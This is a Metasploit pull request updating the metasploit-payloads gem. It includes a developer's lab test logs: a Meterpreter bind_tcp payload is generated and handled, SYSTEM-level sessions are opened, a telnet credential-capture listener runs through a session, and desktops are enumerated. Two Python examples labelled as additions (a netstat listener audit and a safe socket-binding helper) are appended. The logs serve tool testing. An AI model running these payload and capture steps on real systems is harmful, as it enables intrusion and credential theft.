
Update metasploit-payloads gem to 2.0.108 #17516

Merged
merged 1 commit into from
Jan 20, 2023

Conversation

@gwillcox-r7 gwillcox-r7 self-assigned this Jan 20, 2023
@gwillcox-r7
Contributor

Picking this up since 2/3 of these PRs I tested myself already, so it should be easier to get this landed.

@gwillcox-r7
Contributor

First test passing:

msf6 payload(windows/x64/meterpreter/bind_tcp) > generate -f exe -o test-bind-updated.exe
[*] Writing 7168 bytes to test-bind-updated.exe...
msf6 payload(windows/x64/meterpreter/bind_tcp) > run
[-] Unknown command: run
msf6 payload(windows/x64/meterpreter/bind_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(windows/x64/meterpreter/bind_tcp) > 
[*] Started bind TCP handler against 192.168.153.132:4444
[*] Sending stage (200774 bytes) to 192.168.153.132
[*] Meterpreter session 1 opened (192.168.153.128:46065 -> 192.168.153.132:4444) at 2023-01-20 13:00:06 -0600

msf6 payload(windows/x64/meterpreter/bind_tcp) > use auxiliary/server/capture/telnet
msf6 auxiliary(server/capture/telnet) > set ListenerCom 1
[-] Unknown datastore option: ListenerCom. Did you mean ListenerComm?
msf6 auxiliary(server/capture/telnet) > set ListenerComm 1
ListenerComm => 1
msf6 auxiliary(server/capture/telnet) > set SRVHOST 192.168.153.132
SRVHOST => 192.168.153.132
msf6 auxiliary(server/capture/telnet) > run
[*] Auxiliary module running as background job 1.
msf6 auxiliary(server/capture/telnet) > 
[*] Started service listener on 192.168.153.132:23 via the meterpreter on session 1
[*] Server started.

msf6 auxiliary(server/capture/telnet) > set SRVHOST ::1
SRVHOST => ::1
msf6 auxiliary(server/capture/telnet) > run
[*] Auxiliary module running as background job 2.
msf6 auxiliary(server/capture/telnet) > 
[*] Started service listener on [::1]:23 via the meterpreter on session 1
[*] Server started.

msf6 auxiliary(server/capture/telnet) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > netstat -a

Connection list
===============

    Proto  Local address                    Remote address         State        User  Inode  PID/Program name
    -----  -------------                    --------------         -----        ----  -----  ----------------
    tcp    0.0.0.0:135                      0.0.0.0:*              LISTEN       0     0      584/svchost.exe
    tcp    0.0.0.0:445                      0.0.0.0:*              LISTEN       0     0      4/System
    tcp    0.0.0.0:5040                     0.0.0.0:*              LISTEN       0     0      4720/svchost.exe
    tcp    0.0.0.0:7680                     0.0.0.0:*              LISTEN       0     0      1352/svchost.exe
    tcp    0.0.0.0:49664                    0.0.0.0:*              LISTEN       0     0      856/lsass.exe
    tcp    0.0.0.0:49665                    0.0.0.0:*              LISTEN       0     0      688/wininit.exe
    tcp    0.0.0.0:49666                    0.0.0.0:*              LISTEN       0     0      1428/svchost.exe
    tcp    0.0.0.0:49667                    0.0.0.0:*              LISTEN       0     0      1768/svchost.exe
    tcp    0.0.0.0:49668                    0.0.0.0:*              LISTEN       0     0      2604/spoolsv.exe
    tcp    0.0.0.0:49673                    0.0.0.0:*              LISTEN       0     0      832/services.exe
    tcp    192.168.153.132:23               0.0.0.0:*              LISTEN       0     0      696/updated_bind_test.exe
    tcp    192.168.153.132:139              0.0.0.0:*              LISTEN       0     0      4/System
    tcp    192.168.153.132:4444             192.168.153.128:46065  ESTABLISHED  0     0      696/updated_bind_test.exe
    tcp    192.168.153.132:9090             0.0.0.0:*              LISTEN       0     0      696/updated_bind_test.exe
    tcp    192.168.153.132:56334            104.43.200.36:443      TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56339            20.7.1.246:443         ESTABLISHED  0     0      3164/svchost.exe
    tcp    192.168.153.132:56367            184.28.41.37:80        TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56383            20.54.24.169:443       TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56394            23.207.24.151:443      ESTABLISHED  0     0      1352/svchost.exe
    tcp    192.168.153.132:56399            51.91.79.17:443        CLOSE_WAIT   0     0      8056/brave.exe
    tcp    192.168.153.132:56400            72.21.81.240:80        TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56401            72.21.81.240:80        TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56403            72.21.81.240:80        TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56406            51.104.164.114:443     ESTABLISHED  0     0      1352/svchost.exe
    tcp    192.168.153.132:56407            51.104.162.168:443     TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56408            51.104.162.168:443     TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56409            51.104.162.50:443      ESTABLISHED  0     0      1352/svchost.exe
    tcp    192.168.153.132:56410            23.207.18.123:443      ESTABLISHED  0     0      1352/svchost.exe
    tcp    192.168.153.132:56411            23.207.24.151:443      ESTABLISHED  0     0      1352/svchost.exe
    tcp    192.168.153.132:56412            208.111.186.0:80       TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56413            52.242.97.97:443       TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56414            184.28.41.68:80        TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56415            184.28.41.80:80        TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56416            51.104.162.168:443     ESTABLISHED  0     0      1352/svchost.exe
    tcp    192.168.153.132:56417            20.50.80.210:443       TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56419            20.50.80.210:443       TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56420            20.7.2.167:443         ESTABLISHED  0     0      3164/svchost.exe
    tcp    192.168.153.132:56424            184.28.29.162:443      ESTABLISHED  0     0      6280/Widgets.exe
    tcp    192.168.153.132:56425            204.79.197.200:443     ESTABLISHED  0     0      6236/SearchHost.exe
    tcp    192.168.153.132:56426            13.107.42.254:443      ESTABLISHED  0     0      6236/SearchHost.exe
    tcp    192.168.153.132:56427            204.79.197.200:443     ESTABLISHED  0     0      6236/SearchHost.exe
    tcp    192.168.153.132:56428            204.79.197.200:443     ESTABLISHED  0     0      6236/SearchHost.exe
    tcp    192.168.153.132:56429            204.79.197.200:443     ESTABLISHED  0     0      6236/SearchHost.exe
    tcp    192.168.153.132:56430            204.79.197.200:443     ESTABLISHED  0     0      6236/SearchHost.exe
    tcp    192.168.153.132:56431            204.79.197.200:443     ESTABLISHED  0     0      6236/SearchHost.exe
    tcp    192.168.153.132:56432            72.21.91.29:80         ESTABLISHED  0     0      6236/SearchHost.exe
    tcp    192.168.153.132:56433            184.28.29.162:443      ESTABLISHED  0     0      5372/explorer.exe
    tcp    192.168.153.132:56434            204.79.197.203:443     ESTABLISHED  0     0      6280/Widgets.exe
    tcp    192.168.153.132:56437            13.107.42.16:443       TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56438            204.79.197.203:443     TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56440            72.21.81.200:80        ESTABLISHED  0     0      17752/svchost.exe
    tcp    192.168.153.132:56441            72.21.81.200:80        ESTABLISHED  0     0      17752/svchost.exe
    tcp    192.168.153.132:56442            204.79.197.239:443     TIME_WAIT    0     0      0/[System Process]
    tcp6   :::135                           :::*                   LISTEN       0     0      584/svchost.exe
    tcp6   :::445                           :::*                   LISTEN       0     0      4/System
    tcp6   :::7680                          :::*                   LISTEN       0     0      1352/svchost.exe
    tcp6   :::49664                         :::*                   LISTEN       0     0      856/lsass.exe
    tcp6   :::49665                         :::*                   LISTEN       0     0      688/wininit.exe
    tcp6   :::49666                         :::*                   LISTEN       0     0      1428/svchost.exe
    tcp6   :::49667                         :::*                   LISTEN       0     0      1768/svchost.exe
    tcp6   :::49668                         :::*                   LISTEN       0     0      2604/spoolsv.exe
    tcp6   :::49673                         :::*                   LISTEN       0     0      832/services.exe
    tcp6   ::1:23                           :::*                   LISTEN       0     0      696/updated_bind_test.exe
    tcp6   ::1:9090                         :::*                   LISTEN       0     0      696/updated_bind_test.exe
    udp    0.0.0.0:123                      0.0.0.0:*                           0     0      8292/svchost.exe
    udp    0.0.0.0:5050                     0.0.0.0:*                           0     0      4720/svchost.exe
    udp    0.0.0.0:5353                     0.0.0.0:*                           0     0      5460/msedge.exe
    udp    0.0.0.0:5353                     0.0.0.0:*                           0     0      1656/svchost.exe
    udp    0.0.0.0:5353                     0.0.0.0:*                           0     0      5460/msedge.exe
    udp    0.0.0.0:5355                     0.0.0.0:*                           0     0      1656/svchost.exe
    udp    0.0.0.0:60507                    0.0.0.0:*                           0     0      1656/svchost.exe
    udp    0.0.0.0:62226                    0.0.0.0:*                           0     0      1656/svchost.exe
    udp    127.0.0.1:1900                   0.0.0.0:*                           0     0      4196/svchost.exe
    udp    127.0.0.1:54973                  0.0.0.0:*                           0     0      4196/svchost.exe
    udp    127.0.0.1:63242                  0.0.0.0:*                           0     0      2216/svchost.exe
    udp    192.168.153.132:137              0.0.0.0:*                           0     0      4/System
    udp    192.168.153.132:138              0.0.0.0:*                           0     0      4/System
    udp    192.168.153.132:1900             0.0.0.0:*                           0     0      4196/svchost.exe
    udp    192.168.153.132:54972            0.0.0.0:*                           0     0      4196/svchost.exe
    udp6   :::123                           :::*                                0     0      8292/svchost.exe
    udp6   :::5353                          :::*                                0     0      1656/svchost.exe
    udp6   :::5353                          :::*                                0     0      5460/msedge.exe
    udp6   :::5355                          :::*                                0     0      1656/svchost.exe
    udp6   :::60507                         :::*                                0     0      1656/svchost.exe
    udp6   :::62226                         :::*                                0     0      1656/svchost.exe
    udp6   ::1:1900                         :::*                                0     0      4196/svchost.exe
    udp6   ::1:54971                        :::*                                0     0      4196/svchost.exe
    udp6   fe80::7db2:381a:15e0:1a01:1900   :::*                                0     0      4196/svchost.exe
    udp6   fe80::7db2:381a:15e0:1a01:54970  :::*                                0     0      4196/svchost.exe

meterpreter > 
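The `netstat -a` listing above is the manual way of confirming where the updated payload actually listens (here on 192.168.153.132:23 and [::1]:23 rather than on every interface). As an added example, not code from this PR or from metasploit-payloads, the following Python parses rows in the same column layout and reports every listening socket, flagging wildcard binds (0.0.0.0 / ::, i.e. reachable on all interfaces) and listeners owned by processes outside an allowlist, which is the check a defender would automate when validating a host's exposure. The sample rows are constructed to mirror the output above and the allowlist is an assumption for illustration.

```python
"""Audit a Meterpreter/netstat-style connection listing for listening sockets.

Added example (not metasploit-framework or metasploit-payloads code). It parses
rows in the same column layout as `meterpreter > netstat -a` and reports every
LISTEN socket, flagging wildcard binds and listeners owned by processes outside
an allowlist. SAMPLE_NETSTAT is constructed for the example.
"""
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Constructed sample rows in the same layout as the netstat table on the page.
SAMPLE_NETSTAT = """\
Proto  Local address          Remote address         State        User  Inode  PID/Program name
-----  -------------          --------------         -----        ----  -----  ----------------
tcp    0.0.0.0:135            0.0.0.0:*              LISTEN       0     0      584/svchost.exe
tcp    0.0.0.0:445            0.0.0.0:*              LISTEN       0     0      4/System
tcp    192.168.153.132:23     0.0.0.0:*              LISTEN       0     0      696/updated_bind_test.exe
tcp    192.168.153.132:4444   192.168.153.128:46065  ESTABLISHED  0     0      696/updated_bind_test.exe
tcp    192.168.153.132:9090   0.0.0.0:*              LISTEN       0     0      696/updated_bind_test.exe
tcp6   :::445                 :::*                   LISTEN       0     0      4/System
tcp6   ::1:23                 :::*                   LISTEN       0     0      696/updated_bind_test.exe
udp    0.0.0.0:123            0.0.0.0:*                           0     0      8292/svchost.exe
"""

# Hosts that mean "every interface" for IPv4 and IPv6 respectively.
WILDCARD_HOSTS = {"0.0.0.0", "::"}


@dataclass
class SockRow:
    proto: str
    host: str
    port: int
    state: str      # empty for UDP, which has no State column
    pid: int
    program: str


def split_endpoint(endpoint: str) -> Tuple[str, str]:
    """Split 'host:port' on the LAST colon so IPv6 literals survive:
    '::1:23' -> ('::1', '23'), ':::135' -> ('::', '135'), '0.0.0.0:*' -> ('0.0.0.0', '*')."""
    host, _, port = endpoint.rpartition(":")
    return host, port


def parse_netstat(text: str) -> List[SockRow]:
    rows: List[SockRow] = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or not fields[0].startswith(("tcp", "udp")):
            continue  # header, separator or blank line
        # TCP rows carry a State column; UDP rows do not, so they split one field shorter.
        if len(fields) == 7:
            proto, local, _remote, state, _user, _inode, prog = fields
        elif len(fields) == 6:
            proto, local, _remote, _user, _inode, prog = fields
            state = ""
        else:
            continue  # continuation line of a wrapped column; skip rather than guess
        host, port = split_endpoint(local)
        pid_text, _, program = prog.partition("/")
        rows.append(SockRow(proto, host, int(port), state, int(pid_text), program))
    return rows


def listeners(rows: Iterable[SockRow]) -> List[SockRow]:
    """TCP sockets listen only in LISTEN state; a bound UDP socket is always receiving."""
    return [r for r in rows if r.state == "LISTEN" or r.proto.startswith("udp")]


def audit(text: str, allowed_programs: Iterable[str]) -> List[Tuple[str, SockRow]]:
    """Return (finding_kind, row) pairs: 'wildcard-bind' for listeners on every
    interface, 'unexpected-program' for listeners owned by a non-allowlisted process."""
    allowed = set(allowed_programs)
    findings: List[Tuple[str, SockRow]] = []
    for row in listeners(parse_netstat(text)):
        if row.host in WILDCARD_HOSTS:
            findings.append(("wildcard-bind", row))
        if row.program not in allowed:
            findings.append(("unexpected-program", row))
    return findings


if __name__ == "__main__":
    # Assumed allowlist: Windows system processes expected to listen on this host.
    for kind, row in audit(SAMPLE_NETSTAT, {"svchost.exe", "System"}):
        print(f"{kind:<19} {row.proto:<5} {row.host}:{row.port}  {row.pid}/{row.program}")
```

Run against the sample, the audit reports the three listeners owned by `updated_bind_test.exe` (23, 9090 and [::1]:23) as unexpected, and the four wildcard binds (135, 445, [::]:445, UDP 123) as exposed on all interfaces; the ESTABLISHED 4444 row is not a listener and is not reported. Splitting on the last colon is what keeps the IPv6 rows (`:::445`, `::1:23`) parsable.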

@gwillcox-r7
Contributor

gwillcox-r7 commented Jan 20, 2023

rapid7/metasploit-payloads#602 has already been tested over at #17340. Will retest it as part of landing that PR. Atm it seems like we are still binding to 0.0.0.0:2222 with just this PR alone and using the portfwd command.

@gwillcox-r7
Contributor

The enum_desktop addition seems to be working well:

msf6 payload(python/meterpreter/bind_tcp) > sessions

Active sessions
===============

  Id  Name  Type                        Information                            Connection
  --  ----  ----                        -----------                            ----------
  4         meterpreter python/windows  NT AUTHORITY\SYSTEM @ Windows-11-Test  192.168.153.128:38149 -> 192.168.153.132:4444 (192.168.153.132)

msf6 payload(python/meterpreter/bind_tcp) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > enumdesktops 
Enumerating all accessible desktops

Desktops
========

    Session  Station              Name
    -------  -------              ----
    1        WinSta0              Default
    1        WinSta0              Disconnect
    1        WinSta0              Winlogon
    1        Service-0x0-11a04c$  sbox_alternate_desktop_0x2D8C
    1        Service-0x0-11a04c$  sbox_alternate_desktop_0x27F4
    1        Service-0x0-11a04c$  sbox_alternate_desktop_0x274
    1        Service-0x0-11a04c$  sbox_alternate_desktop_0x2324
    1        Service-0x0-11a04c$  sbox_alternate_desktop_0x1554
    1        Service-0x0-11a04c$  sbox_alternate_desktop_0x1F80

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.153.132 - Meterpreter session 4 closed.  Reason: User exit
msf6 payload(python/meterpreter/bind_tcp) > to_handler
[*] Payload Handler Started as Job 7
msf6 payload(python/meterpreter/bind_tcp) > 
[*] Started bind TCP handler against 192.168.153.132:4444
[*] Sending stage (24380 bytes) to 192.168.153.132
[*] Meterpreter session 5 opened (192.168.153.128:44705 -> 192.168.153.132:4444) at 2023-01-20 13:42:10 -0600

msf6 payload(python/meterpreter/bind_tcp) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > enumdesktops 
Enumerating all accessible desktops

Desktops
========

    Session  Station           Name
    -------  -------           ----
    0        WinSta0           Default
    0        WinSta0           Disconnect
    0        WinSta0           Winlogon
    0        msswindowstation  mssrestricteddesk

meterpreter > getprivs
[-] The "getprivs" command is not supported by this Meterpreter type (python/windows)
meterpreter > background
[*] Backgrounding session 5...
msf6 payload(python/meterpreter/bind_tcp) > sessions 

Active sessions
===============

  Id  Name  Type                        Information                            Connection
  --  ----  ----                        -----------                            ----------
  5         meterpreter python/windows  NT AUTHORITY\SYSTEM @ Windows-11-Test  192.168.153.128:44705 -> 192.168.153.132:4444 (192.168.153.132)

msf6 payload(python/meterpreter/bind_tcp) > 

@gwillcox-r7
Contributor

Everything looks good on my side, will get this landed now.

@gwillcox-r7
Contributor

Release Notes

The version of metasploit-payloads has been bumped up to add support for dual IPv4/IPv6 stacks to Python Meterpreter, add support for enumerating desktops with the enumdesktops command to Python Meterpreter, and also add support for binding to the specified localhost to compiled versions of Meterpreter.
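The release notes describe a listener that binds to the host the user specified, for IPv4 and for IPv6, instead of to every interface. As an added example in plain Python sockets (not metasploit-payloads code, and not a description of how Meterpreter implements it), the following shows the bind-host handling such a listener needs: resolve the numeric host to its address family, bind exactly that address, keep the IPv6 socket v6-only so the two families stay independent, and refuse a wildcard host unless the caller opts in, since a wildcard bind exposes the port on every interface. The function names are assumptions for illustration.

```python
"""Open listening sockets on exactly the host the caller specified.

Added example, not metasploit-payloads code. Demonstrates per-family binding
(IPv4 or IPv6) to a specific address and refusing wildcard binds by default.
"""
import socket
from typing import List, Tuple

# Hosts that mean "every interface": empty (AI_PASSIVE default), IPv4 any, IPv6 any.
WILDCARD_HOSTS = {"", "0.0.0.0", "::"}


def is_wildcard(host: str) -> bool:
    return host in WILDCARD_HOSTS


def resolve_bind_addresses(host: str, port: int) -> List[Tuple[str, tuple]]:
    """Return (family_name, sockaddr) pairs for a numeric host literal.
    AI_NUMERICHOST keeps this offline (no DNS); an empty host falls back to
    AI_PASSIVE wildcards for every family the OS supports."""
    flags = socket.AI_PASSIVE | (socket.AI_NUMERICHOST if host else 0)
    infos = socket.getaddrinfo(host or None, port, socket.AF_UNSPEC,
                               socket.SOCK_STREAM, 0, flags)
    return [(family.name, sockaddr) for family, _type, _proto, _canon, sockaddr in infos]


def close_all(socks: List[socket.socket]) -> None:
    for s in socks:
        s.close()


def open_listeners(host: str, port: int, allow_wildcard: bool = False) -> List[socket.socket]:
    """Bind one listening socket per resolved address. Wildcard hosts are rejected
    unless allow_wildcard=True, so exposing the port on all interfaces is an explicit choice."""
    if is_wildcard(host) and not allow_wildcard:
        raise ValueError(f"refusing wildcard bind host {host!r}; pass allow_wildcard=True to expose all interfaces")
    socks: List[socket.socket] = []
    try:
        for family_name, sockaddr in resolve_bind_addresses(host, port):
            family = socket.AddressFamily[family_name]
            s = socket.socket(family, socket.SOCK_STREAM)
            if family == socket.AF_INET6:
                # Without V6ONLY a '::' socket may also accept IPv4 on Linux; keeping the
                # families separate means each socket binds exactly what was asked for.
                s.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
            s.bind(sockaddr)
            s.listen(5)
            socks.append(s)
    except OSError:
        close_all(socks)  # do not leak half-opened listeners on failure
        raise
    return socks


def bound_addresses(socks: List[socket.socket]) -> List[Tuple[str, int]]:
    """(host, port) actually bound for each socket, as the OS reports it."""
    return [tuple(s.getsockname()[:2]) for s in socks]


if __name__ == "__main__":
    # Loopback, port 0 so the OS picks a free port; constructed for the demonstration.
    listening = open_listeners("127.0.0.1", 0)
    print("bound:", bound_addresses(listening))
    close_all(listening)
    try:
        open_listeners("0.0.0.0", 0)
    except ValueError as exc:
        print("rejected:", exc)
```

`bound_addresses` is the programmatic counterpart of the `netstat -a` check in the PR's test log: after binding, ask the OS what address the socket actually holds rather than trusting the requested one. Binding `::1` takes the same path through the `AF_INET6` branch on a host with IPv6 enabled.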
